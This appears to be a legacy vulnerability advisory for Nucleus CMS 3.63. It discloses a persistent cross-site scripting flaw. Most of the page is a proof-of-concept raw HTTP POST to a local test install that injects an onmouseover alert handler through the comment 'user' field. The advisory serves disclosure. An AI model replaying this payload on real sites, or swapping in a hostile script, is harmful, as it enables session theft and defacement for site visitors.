Home
Consulting
Advisories
Software
Articles
Contact

Nucleus CMS 3.63 Persistent Cross-site Scripting

Legacy Advisories

Description

Proof Of Concept

POST http://localhost/nucleus3.63/index.php?itemid=1 HTTP/1.1
Host: localhost
Connection: keep-alive
Referer: http://localhost/nucleus3.63/index.php?itemid=1
Content-Length: 119
Cache-Control: max-age=0
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

action=addcomment&url=index.php%3Fitemid%3D1&itemid=1&body=xxx&user="onmouseover="alert(0)"&userid=zzzz&email=x%40x.com


Copyright © 2018 AutoSec Tools LLC